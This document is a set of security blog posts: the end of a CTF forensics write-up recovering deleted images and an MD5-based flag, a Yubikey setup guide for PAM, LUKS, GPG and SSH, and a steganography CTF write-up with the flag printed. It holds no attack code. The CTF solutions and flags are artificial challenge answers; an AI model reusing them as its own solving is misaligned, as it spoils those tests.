<span class="err"> -r--r--r-- 0 0 225 25-Mar-2019 11:14 liens_utiles.txt~</span>
<span class="err"> -r--r--r-- 0 0 997307 22-Mar-2019 17:54 linux_configuration-fr-v1.2.pdf</span>
<span class="err"> -r--r--r-- 0 0 188936 22-Mar-2019 17:54 np_cryhod_notetech.pdf</span>
<span class="err"> -r--r--r-- 0 0 0 22-Mar-2019 17:29 tmp</span>
<span class="err"> -r--r--r-- 0 0 36 22-Mar-2019 17:54 tools.pdf</span>
</code></pre></div>
<p>There is a <code>.download</code> folder that looks promising:</p>
<div class="highlight"><pre><span></span><code><span class="n">Directory</span> <span class="o">/</span><span class="p">.</span><span class="n">download</span>
<span class="o">></span><span class="n">dr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">16</span><span class="p">:</span><span class="mi">10</span> <span class="p">.</span>
<span class="n">dr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">xr</span><span class="o">-</span><span class="n">x</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">0</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">07</span> <span class="p">..</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 374318 22-Mar-2019 18:05 27158365900_6d256cfae8_h.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 77140 25-Mar-2019 15:42 ECW_flag_test.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 3136473 22-Mar-2019 18:05 Red_Kitten_01.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 64526 25-Mar-2019 15:44 clue.jpg</span>
<span class="o">-</span><span class="n">r</span><span class="c1">--r--r-- 0 0 108838 25-Mar-2019 15:42 example.jpg</span>
</code></pre></div>
<p>Let's look at the image files:</p>
<p><img alt="ntfs_clue1.jpg" src="https://blog.nlegall.fr/images/ecw/ntfs_clue1.jpg"></p>
<p><img alt="ntfs_clue2.jpg" src="https://blog.nlegall.fr/images/ecw/ntfs_clue2.jpg"></p>
<p><img alt="ntfs_clue3.jpg" src="https://blog.nlegall.fr/images/ecw/ntfs_clue3.jpg"></p>
<p>Not very conclusive, but a nice sense of humour from the challenge author ;).</p>
<p>Let's look at files that were deleted but are still recoverable. Select <code>undelete</code> in the bottom menu:</p>
<div class="highlight"><pre><span></span><code><span class="n">Deleted</span> <span class="n">files</span>
<span class="o">></span><span class="p">.</span><span class="o">/</span><span class="mi">3590</span><span class="n">F75ABA9E485486C100C1A9D4FF06NKQITXGIIGQUSKWT</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">07</span> <span class="mi">261795840</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">ECW_flag</span><span class="p">.</span><span class="n">jpg</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">15</span><span class="p">:</span><span class="mi">42</span> <span class="mi">52746</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">methodology</span><span class="p">.</span><span class="n">jpg</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">15</span><span class="p">:</span><span class="mi">43</span> <span class="mi">113105</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">special_kitten</span><span class="p">.</span><span class="n">png</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">16</span><span class="p">:</span><span class="mi">08</span> <span class="mi">1688578</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">toto</span><span class="p">.</span><span class="n">png</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">13</span><span class="p">:</span><span class="mi">15</span> <span class="mi">1688536</span>
<span class="o">/</span><span class="p">.</span><span class="n">download</span><span class="o">/</span><span class="n">toto</span><span class="p">.</span><span class="n">png</span><span class="p">:</span><span class="n">ads</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">13</span><span class="p">:</span><span class="mi">15</span> <span class="mi">7</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">....</span><span class="n">ZZZ</span><span class="p">.</span><span class="n">ZZ</span><span class="p">.</span><span class="n">ZZZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">592</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">..</span><span class="n">Z</span><span class="p">.</span><span class="n">ZZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">....</span><span class="n">Z</span><span class="p">.</span><span class="n">Z</span><span class="p">...</span><span class="n">ZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
<span class="p">[...]</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZZZ</span><span class="p">.</span><span class="n">ZZ</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
<span class="n">Z</span><span class="p">..</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="p">...</span><span class="n">Z</span><span class="p">..</span><span class="n">ZZ</span><span class="o">/</span><span class="n">ZZZZ</span><span class="p">.</span><span class="n">ZZ</span><span class="p">.</span><span class="n">ZZ</span><span class="p">.....</span><span class="n">Z</span> <span class="mi">25</span><span class="o">-</span><span class="n">Mar</span><span class="o">-</span><span class="mi">2019</span> <span class="mi">14</span><span class="p">:</span><span class="mi">06</span> <span class="mi">600</span>
</code></pre></div>
<p>OK, so there are indeed more images to recover. We copy them out of the disk image onto the local machine:</p>
<div class="highlight"><pre><span></span><code>$ ls -al
total <span class="m">3480</span>
drwxr-xr-x <span class="m">2</span> nlegall nlegall <span class="m">4096</span> oct. <span class="m">24</span> <span class="m">12</span>:58 .
drwxr-xr-x <span class="m">3</span> nlegall nlegall <span class="m">4096</span> oct. <span class="m">24</span> <span class="m">12</span>:57 ..
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">52746</span> mars <span class="m">25</span> <span class="m">2019</span> ECW_flag.jpg
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">113105</span> mars <span class="m">25</span> <span class="m">2019</span> methodology.jpg
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">1688578</span> mars <span class="m">25</span> <span class="m">2019</span> special_kitten.png
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">1688536</span> mars <span class="m">25</span> <span class="m">2019</span> toto.png
-rw------- <span class="m">1</span> nlegall nlegall <span class="m">7</span> mars <span class="m">25</span> <span class="m">2019</span> toto.png:ads
</code></pre></div>
<p><code>special_kitten.png</code> is the largest, so we start with it. An image file means metadata; <code>exiftool</code> lists them:</p>
<div class="highlight"><pre><span></span><code>$ exiftool special_kitten.png
ExifTool Version Number : <span class="m">11</span>.70
File Name : special_kitten.png
Directory : .
File Size : <span class="m">1649</span> kB
File Modification Date/Time : <span class="m">2019</span>:03:25 <span class="m">16</span>:08:52+01:00
File Access Date/Time : <span class="m">2019</span>:03:25 <span class="m">16</span>:08:52+01:00
File Inode Change Date/Time : <span class="m">2019</span>:10:24 <span class="m">12</span>:58:30+02:00
File Permissions : rw-------
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : <span class="m">8000</span>
Image Height : <span class="m">4500</span>
Bit Depth : <span class="m">8</span>
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Pixels Per Unit X : <span class="m">11811</span>
Pixels Per Unit Y : <span class="m">11811</span>
Pixel Units : meters
Warning : <span class="o">[</span>minor<span class="o">]</span> Text chunk<span class="o">(</span>s<span class="o">)</span> found after PNG IDAT <span class="o">(</span>may be ignored by some readers<span class="o">)</span>
Artist : calculate Message Digest <span class="m">5</span> of file and add one
Image Size : 8000x4500
Megapixels : <span class="m">36</span>.0
</code></pre></div>
<p>YEAH! A hint about the flag shows up in the <code>Artist</code> field. Let's follow the instructions:</p>
<div class="highlight"><pre><span></span><code>$ md5sum special_kitten.png
3d9382f08cd82a430a59343b21934752 special_kitten.png
</code></pre></div>
<p>Then add one to the hash and wrap it in the flag format:</p>
<p><code>2 + 1 = 3 => ECW{3d9382f08cd82a430a59343b21934753}</code></p>
<p>Done, 50 more points :).</p>
<h1>Yubikey</h1>
<p><em>2019-08-09, nlegall, https://blog.nlegall.fr/yubikey.html</em></p>
<h1>Overview</h1>
<p><img alt="yubikey" src="https://www.yubico.com/wp-content/uploads/2019/07/yubikey5_family_new.png"></p>
<p>The Yubikey is one of the best-known U2F (Universal Second Factor) authentication devices. The protocol is backed by the FIDO Alliance and is meant to be open to all; many other keys support the standard: Key-ID FIDO U2F, Keydo FIDO U2F...</p>
<p>The Yubikey has the advantage of extensive documentation covering every possible use: PAM, KeePass, GPG...</p>
<p>Here is a recap of the documentation I used to configure the key and the applications or services.</p>
<p>If you want to add something or a new use, feel free to contact me.</p>
<h1>Configuration</h1>
<h2>PAM</h2>
<div class="highlight"><pre><span></span><code><span class="c1"># https://developers.yubico.com/pam-u2f/</span>
pacaur -S pam-2uf
pamu2fcfg > /etc/u2f_mappings
cat /etc/u2f_mappings
</code></pre></div>
<p>Then edit <code>/etc/pam.d/system-auth</code> to add U2F as a new PAM authentication method, with a line such as <code>auth sufficient pam_u2f.so authfile=/etc/u2f_mappings cue</code> (<code>authfile</code> points at the mapping file created above, <code>cue</code> prints a prompt asking you to touch the key). Here is the default configuration on Manjaro:</p>
<div class="highlight"><pre><span></span><code><span class="err">auth required pam_unix.so try_first_pass nullok</span>
<span class="err">auth optional pam_permit.so</span>
<span class="err">auth required pam_env.so</span>
</code></pre></div>
<p>Depending on what you want, the second field (the control flag) can take the following values:</p>
<ul>
<li>sufficient: if the module succeeds and no earlier <code>required</code> module has failed, authentication succeeds immediately and the remaining modules are not run; a failure of a sufficient module is ignored.</li>
<li>required: the module must succeed; if it fails, the stack will end in failure, but the remaining modules are still run, so the user is not told which one rejected them.</li>
<li>requisite: like required, but a failure ends the stack immediately, so the user sees the failure right away.</li>
<li>optional: the success or failure of this module only matters if it is the only module in the stack.</li>
</ul>
<p>If you go with <code>sufficient</code>, where you put the new line matters:</p>
<ul>
<li>above <code>pam_unix.so</code> (the first line in the default file), the key alone is enough to log in, and the password still works when you do not have the key.</li>
<li>below it, the password is always required, but a failing key is ignored (that is what <code>sufficient</code> means), so the password alone still gets you in. To demand both the password and the key, put the line below <code>pam_unix.so</code> with <code>required</code> instead.</li>
</ul>
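<p>The interaction between the control flag and the position of the line is easy to get wrong, so here is an added example (mine, not from the post) that replays the documented Linux-PAM rules for the four simple keywords on the Manjaro stack above, for the three placements discussed. It is a simplified model: it does not call PAM, it ignores the <code>[value=action]</code> syntax and the <code>new_authtok_reqd</code> and <code>ignore</code> subtleties, and it assumes that <code>pam_permit.so</code> and <code>pam_env.so</code> always succeed.</p>

```python
#!/usr/bin/env python3
"""Model of how Linux-PAM combines the results of an 'auth' stack written
with the simple control keywords (required, requisite, sufficient, optional).
Added example, not from the blog post: it does not call PAM, it replays the
documented rules on a table of module verdicts so the effect of where the
pam_u2f.so line goes can be checked before touching /etc/pam.d."""
from __future__ import annotations


def run_auth_stack(stack: list[tuple[str, str]], verdicts: dict[str, bool]) -> bool:
    """Evaluate a stack of (control, module) entries top to bottom.

    required   : a failure is remembered and the stack keeps running, so the
                 user cannot tell which module rejected them.
    requisite  : a failure ends the stack immediately with failure.
    sufficient : a success ends the stack immediately, and it is a success
                 only if no earlier 'required' module failed; a failure of a
                 sufficient module is simply ignored.
    optional   : the verdict only counts when it is the only module listed.
    """
    required_failed = False
    for control, module in stack:
        ok = verdicts[module]
        if control == "required":
            required_failed = required_failed or not ok
        elif control == "requisite":
            if not ok:
                return False
        elif control == "sufficient":
            if ok:
                return not required_failed
        elif control == "optional":
            if len(stack) == 1:
                return ok
        else:
            raise ValueError(f"unknown control flag {control!r}")
    return not required_failed


# Default /etc/pam.d/system-auth shown in the post (Manjaro).
MANJARO_DEFAULT = [
    ("required", "pam_unix.so"),
    ("optional", "pam_permit.so"),
    ("required", "pam_env.so"),
]
U2F = "pam_u2f.so"


def with_u2f(control: str, above_unix: bool) -> list[tuple[str, str]]:
    """Insert the pam_u2f line either above or just below pam_unix.so."""
    line = (control, U2F)
    if above_unix:
        return [line] + MANJARO_DEFAULT
    return [MANJARO_DEFAULT[0], line] + MANJARO_DEFAULT[1:]


def login(stack: list[tuple[str, str]], password_ok: bool, key_ok: bool) -> bool:
    """Assumption: pam_permit.so and pam_env.so always succeed."""
    verdicts = {"pam_unix.so": password_ok, U2F: key_ok,
                "pam_permit.so": True, "pam_env.so": True}
    return run_auth_stack(stack, verdicts)


def summary(stack: list[tuple[str, str]]) -> dict[str, bool]:
    """Which combinations of password and key get in with this stack."""
    return {
        "password only": login(stack, True, False),
        "key only": login(stack, False, True),
        "both": login(stack, True, True),
        "neither": login(stack, False, False),
    }


if __name__ == "__main__":
    for name, stack in [("sufficient above pam_unix", with_u2f("sufficient", True)),
                        ("sufficient below pam_unix", with_u2f("sufficient", False)),
                        ("required below pam_unix", with_u2f("required", False))]:
        print(f"{name:28s} {summary(stack)}")
```

<p>The second row of the output is the one to remember: with <code>sufficient</code> placed below <code>pam_unix.so</code>, "password only" is still accepted, so that layout adds no second factor at all.</p>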
<h2>LUKS</h2>
<p>LUKS (Linux Unified Key Setup) is the disk encryption format considered the standard on Linux. Its reference implementation is <code>cryptsetup</code>, on top of <code>dm-crypt</code> for volume encryption (<a href="https://gitlab.com/cryptsetup/cryptsetup">git project</a>). When you choose to encrypt your disk during installation, LUKS is almost always what is used.</p>
<p>To see the state of your partition (and which key slots are in use):</p>
<div class="highlight"><pre><span></span><code>sudo cryptsetup luksDump /dev/nvme0n1p2
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># https://github.com/agherzan/yubikey-full-disk-encryption</span>
pacaur -S yubikey-full-disk-encryption-git
vim /etc/ykfde.conf
sudo ykfde-enroll -d /dev/nvme0n1p2 -s <span class="m">3</span>
sudo cryptsetup luksOpen --test-passphrase /dev/nvme0n1p2 --key-slot<span class="o">=</span><span class="m">3</span> -v
</code></pre></div>
<p>If the last command returns <code>Key slot 3 unlocked</code>, the slot is configured correctly and you should be able to unlock the LUKS volume with the passphrase plus the key. Keep a plain passphrase in another slot as a fallback: ykfde derives the unlock secret from the key's challenge-response, so if the key is lost and that is the only slot, the volume is unrecoverable.</p>
<h2>GPG</h2>
<p>The advantage is having your GPG key with you at all times :). The private key is then no longer protected by its passphrase but by the PIN set on the card. By default the user PIN is <code>123456</code> and the admin PIN is <code>12345678</code>; change both before moving anything onto the card.</p>
<p><code>keytocard</code> moves the private key: afterwards the keyring only holds stubs pointing to the card, and the card cannot export the key back, so make a backup of the secret key (<code>gpg --export-secret-keys</code>) before the transfer if you want an offline copy. On another machine, import the public key (and only the public key) and run <code>gpg --card-status</code> so that the stubs for the private keys held on the card are created.</p>
<div class="highlight"><pre><span></span><code>gpg --card-edit
admin
passwd
<span class="c1"># PIN</span>
<span class="m">1</span>
<span class="c1"># Admin bin</span>
<span class="m">3</span>
<span class="c1"># Reset code</span>
<span class="m">4</span>
verify
quit
</code></pre></div>
<h3>Generating the GPG keys</h3>
<div class="highlight"><pre><span></span><code><span class="c1"># primary key: 8 (RSA, set your own capabilities), E to drop Encrypt so only Sign and Certify</span>
<span class="c1"># remain, Q, 4096 bits, no expiry (0), your name and email, your passphrase</span>
gpg --expert --full-gen-key
gpg --expert --edit-key &lt;longid&gt;
<span class="c1"># signing subkey: 8 (RSA), toggle until only S is set, Q, 4096</span>
gpg> addkey
<span class="c1"># encryption subkey: 8 (RSA), only E, Q, 4096</span>
gpg> addkey
<span class="c1"># authentication subkey, only A: needed if the card is to be used for SSH (see below)</span>
gpg> addkey
gpg> save
</code></pre></div>
<h3>Moving the keys to the card</h3>
<div class="highlight"><pre><span></span><code>gpg --expert --edit-key &lt;longid&gt;
gpg> toggle      <span class="c1"># only needed on GnuPG &lt; 2.1 to show the secret keys</span>
gpg> keytocard   <span class="c1"># primary key (1 = Signature key); skip this if you keep the primary key offline</span>
gpg> key 1       <span class="c1"># select the first subkey (marked with *), move it, then deselect it</span>
gpg> keytocard
gpg> key 1
gpg> key 2       <span class="c1"># same for the second (and third) subkey</span>
gpg> keytocard
gpg> save
</code></pre></div>
<h2>SSH</h2>
<p>The key can also be used for SSH logins on the same principle as PAM, this time through its one-time password (OTP) mode: the OTP typed by the key is checked by a PAM module, alongside or instead of the password. This is different from using a GPG key held on the card as an SSH key, covered below.</p>
<p>Install the package that provides the PAM module and create the mapping file:</p>
<div class="highlight"><pre><span></span><code>apt install libpam-yubico
touch /etc/ssh/authorized_yubikeys
<span class="c1"># YUBIKEY_ID is the first 12 characters (the public id) of any OTP the key types:</span>
<span class="c1"># read -p "Enter a YubiKey OTP: " s &amp;&amp; echo 'The key id is' ${s:0:12}</span>
<span class="nb">echo</span> <span class="s1">'USER:YUBIKEY_ID'</span> >> /etc/ssh/authorized_yubikeys
</code></pre></div>
<p>It needs the Yubico <a href="https://upgrade.yubico.com/getapikey/">validation API</a> to work: the module sends each OTP to the YubiCloud servers, so the SSH server needs outbound access to them. No account is required; an e-mail address and an OTP generated by the key are asked for, and you get an <code>ID</code> (client id) and the matching <code>KEY</code> (API key).</p>
<p><code>/etc/pam.d/sshd</code></p>
<div class="highlight"><pre><span></span><code>auth sufficient pam_yubico.so id=ID key=KEY authfile=/etc/ssh/authorized_yubikeys
</code></pre></div>
<p>With <code>sufficient</code>, a valid OTP alone logs you in; use <code>required</code> and keep the existing password line (<code>@include common-auth</code> on Debian) after it to ask for both. sshd only hands the prompt to PAM when <code>UsePAM yes</code> and <code>ChallengeResponseAuthentication yes</code> (<code>KbdInteractiveAuthentication</code> on recent OpenSSH) are set in <code>sshd_config</code>.</p>
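<p>The <code>${s:0:12}</code> trick works because a YubiKey OTP is 44 modhex characters: a 12-character public id (6 bytes) that identifies the key, followed by 32 characters carrying the 16-byte AES-encrypted, changing part. The following added example (mine, not from the post) decodes modhex, checks the shape of the OTP before cutting out the id, and resolves a user against a <code>user:id1:id2</code> authfile in the format pam_yubico reads. The OTP and the authfile are constructed; the example does not validate the OTP itself, which is what the id/key pair and the YubiCloud are for.</p>

```python
#!/usr/bin/env python3
"""Split a YubiKey OTP into its public id and token, decode modhex, and look
a user up in a pam_yubico-style authfile. Added example with constructed data;
it performs the local mapping check only, not the OTP validation."""

MODHEX_ALPHABET = "cbdefghijklnrtuv"   # modhex digit i is MODHEX_ALPHABET[i]
PUBLIC_ID_LEN = 12                     # 6 bytes -> 12 modhex characters
OTP_LEN = 44                           # 12 (public id) + 32 (16-byte encrypted token)


def modhex_decode(text):
    """Decode a modhex string to bytes; raises ValueError on bad input."""
    if len(text) % 2 or any(c not in MODHEX_ALPHABET for c in text):
        raise ValueError("not a modhex string")
    nibbles = [MODHEX_ALPHABET.index(c) for c in text]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[::2], nibbles[1::2]))


def modhex_encode(data):
    return "".join(MODHEX_ALPHABET[b >> 4] + MODHEX_ALPHABET[b & 0xF] for b in data)


def split_otp(otp):
    """Return (public_id, token). Same cut as ${s:0:12} in the post, but it
    refuses anything that is not a well-formed 44-character modhex OTP."""
    otp = otp.strip()
    if len(otp) != OTP_LEN:
        raise ValueError(f"OTP must be {OTP_LEN} modhex characters, got {len(otp)}")
    modhex_decode(otp)   # charset check
    return otp[:PUBLIC_ID_LEN], otp[PUBLIC_ID_LEN:]


def parse_authfile(text):
    """pam_yubico authfile: one 'user:id1:id2:...' per line, '#' comments."""
    mapping = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, *ids = line.split(":")
        mapping.setdefault(user, set()).update(i for i in ids if i)
    return mapping


def otp_allowed_for(user, otp, authfile_text):
    """True when the OTP's public id is listed for that user. The OTP still
    has to be validated by the YubiCloud (id/key in pam_yubico) before the
    login is accepted; this only mirrors the authfile lookup."""
    public_id, _ = split_otp(otp)
    return public_id in parse_authfile(authfile_text).get(user, set())


# Constructed data: an OTP for the key with public id ccccccbcdefg and an authfile.
SAMPLE_OTP = "ccccccbcdefg" + "hijklnrtuvcbdefg" * 2
SAMPLE_AUTHFILE = """\
# constructed /etc/ssh/authorized_yubikeys: user:public_id[:public_id...]
alice:ccccccbcdefg
bob:cccccccccccb:ccccccccbcdc
"""

if __name__ == "__main__":
    public_id, token = split_otp(SAMPLE_OTP)
    print("public id:", public_id, "->", modhex_decode(public_id).hex())
    print("alice allowed:", otp_allowed_for("alice", SAMPLE_OTP, SAMPLE_AUTHFILE))
    print("bob allowed:", otp_allowed_for("bob", SAMPLE_OTP, SAMPLE_AUTHFILE))
```

<p>The public id is modhex because the key types it as keyboard scan codes that look the same on every keyboard layout; decoding it gives the 6-byte identity that the validation servers also report.</p>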
<h3>With GPG</h3>
<p>A GPG authentication subkey held on the card can serve as an SSH key: gpg-agent exposes it through its SSH agent interface (add <code>enable-ssh-support</code> to <code>~/.gnupg/gpg-agent.conf</code> and point <code>SSH_AUTH_SOCK</code> at its socket), and the private key never leaves the card.</p>
<div class="highlight"><pre><span></span><code><span class="nb">echo</span> <span class="nv">$SSH_AUTH_SOCK</span>
> /run/user/1000/gnupg/S.gpg-agent.ssh
ssh-add -l
ssh-add -L <span class="p">|</span> grep <span class="s2">"cardno:000605553211"</span> > ~/.ssh/id_rsa_yubikey.pub
cat ~/.ssh/id_rsa_yubikey.pub
</code></pre></div>
<p>All that is left is to copy this public key to the servers you want to reach with the Yubikey.</p>
<p>If the card is not inserted, you will be asked for it explicitly, and then for the PIN.</p>
<h2>Windows</h2>
<p>The YubiKey 5 is currently not fully supported on Windows. Configuration used to go through the "YubiKey for Windows Hello" app from the Microsoft Store; the documentation is available <a href="https://support.yubico.com/support/solutions/articles/15000006472">here</a>, but Yubico's note is clear:</p>
<div class="highlight"><pre><span></span><code>NOTE: Many customers have reached out to us asking why the YubiKey for Windows Hello app is not compatible with the YubiKey 5 Series and when the application will be updated to support the YubiKey 5 Series. The short answer is - it won't be. The YubiKey for Windows Hello app will no longer be receiving updates and will soon be removed from the Microsoft Store.
</code></pre></div>
<h1>LeHack 19 - alphajet</h1>
<p><em>2019-07-07, nlegall, https://blog.nlegall.fr/lehack-19-alphajet.html</em></p>
<p><em>File : <a href="https://blog.nlegall.fr/files/lehack/19/alphajet.pgm">alphajet.pgm</a></em></p>
<div class="highlight"><pre><span></span><code>alphajet
50 Points
an easy stega
Url: https://static.wargame.rocks/alphajet.pgm
</code></pre></div>
<p>In steganography, the LSB (Least Significant Bit) and MSB (Most Significant Bit) techniques are the most widely used. We can therefore assume that the flag of this challenge was hidden with one of these methods.</p>
<p>However, the <code>pgm</code> format is not recognised by most analysis tools. It first has to be converted to <code>png</code> so that the tools can work on it. This is easily done in Python with the Pillow library.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"alphajet.pgm"</span><span class="p">,</span> <span class="n">mode</span><span class="o">=</span><span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
<span class="c1">#P2</span>
<span class="n">_</span> <span class="o">=</span> <span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span>
<span class="c1">#Dimensions du fichier : 567 * 291 </span>
<span class="n">width</span><span class="p">,</span> <span class="n">height</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">([</span><span class="nb">int</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">" "</span><span class="p">)])</span>
<span class="c1">#rebuilding de l'image</span>
<span class="n">img</span> <span class="o">=</span> <span class="n">Image</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s2">"L"</span><span class="p">,</span> <span class="p">(</span><span class="n">width</span><span class="p">,</span> <span class="n">height</span><span class="p">),</span> <span class="p">(</span><span class="mi">0</span><span class="p">,))</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">height</span><span class="p">):</span>
<span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">width</span><span class="p">):</span>
<span class="n">img</span><span class="o">.</span><span class="n">putpixel</span><span class="p">((</span><span class="n">j</span><span class="p">,</span><span class="n">i</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">fp</span><span class="o">.</span><span class="n">readline</span><span class="p">()))</span>
<span class="n">img</span><span class="o">.</span><span class="n">save</span><span class="p">(</span><span class="s2">"alphaget.png"</span><span class="p">)</span>
</code></pre></div>
<p>Once our <code>png</code> is created, we can use the <code>zsteg</code> tool, for example:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># gem install zsteg</span>
$ zsteg alphaget.png
b1,r,lsb,xy .. text: <span class="s2">"Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4WiQofuCeMEf8672}.Le flag est: lh_{EtMy4"</span>
</code></pre></div>
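The same extraction done by hand, as an added example that is not part of the original post: a small P2 parser (which also consumes the maximum-value token and the <code>#</code> comments the format allows) and an LSB reader that packs the low bit of each pixel, row by row and MSB first, into bytes. The cover image and the hidden text are constructed inline; the bit order within a byte is an assumption (zsteg exposes its own options for it).

```python
#!/usr/bin/env python3
"""Added example (not from the original post): read a plain-text PGM (P2)
and recover a message hidden in the least significant bit of each pixel."""
import re

MAGIC = "P2"


def parse_p2(text: str):
    """Return (width, height, maxval, pixels) for a P2 image.

    The P2 layout is: magic, width, height, maxval, then one integer per
    pixel, all separated by arbitrary whitespace; '#' starts a comment.
    """
    tokens = re.sub(r"#[^\n]*", "", text).split()
    if not tokens or tokens[0] != MAGIC:
        raise ValueError("not a P2 (ASCII greyscale) PGM file")
    width, height, maxval = (int(t) for t in tokens[1:4])
    pixels = [int(t) for t in tokens[4:]]
    if len(pixels) != width * height:
        raise ValueError("pixel count does not match the declared size")
    if any(p < 0 or p > maxval for p in pixels):
        raise ValueError("pixel value outside 0..maxval")
    return width, height, maxval, pixels


def lsb_bytes(pixels) -> bytes:
    """Pack the low bit of every pixel into bytes, 8 pixels per byte,
    MSB first, in storage order (row by row)."""
    out = bytearray()
    for i in range(0, len(pixels) - len(pixels) % 8, 8):
        byte = 0
        for p in pixels[i:i + 8]:
            byte = (byte << 1) | (p & 1)
        out.append(byte)
    return bytes(out)


def embed_lsb(pixels, payload: bytes):
    """Constructed helper for the demo: overwrite the low bit of the first
    8*len(payload) pixels with the payload bits (same bit order as above)."""
    bits = [(b >> (7 - k)) & 1 for b in payload for k in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("payload does not fit in the cover image")
    stego = list(pixels)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & ~1) | bit
    return stego


def to_p2(width, height, maxval, pixels) -> str:
    """Serialise an image as P2 text, one row per line."""
    rows = (" ".join(str(p) for p in pixels[r * width:(r + 1) * width])
            for r in range(height))
    header = f"{MAGIC}\n# constructed cover image\n{width} {height}\n{maxval}\n"
    return header + "\n".join(rows) + "\n"


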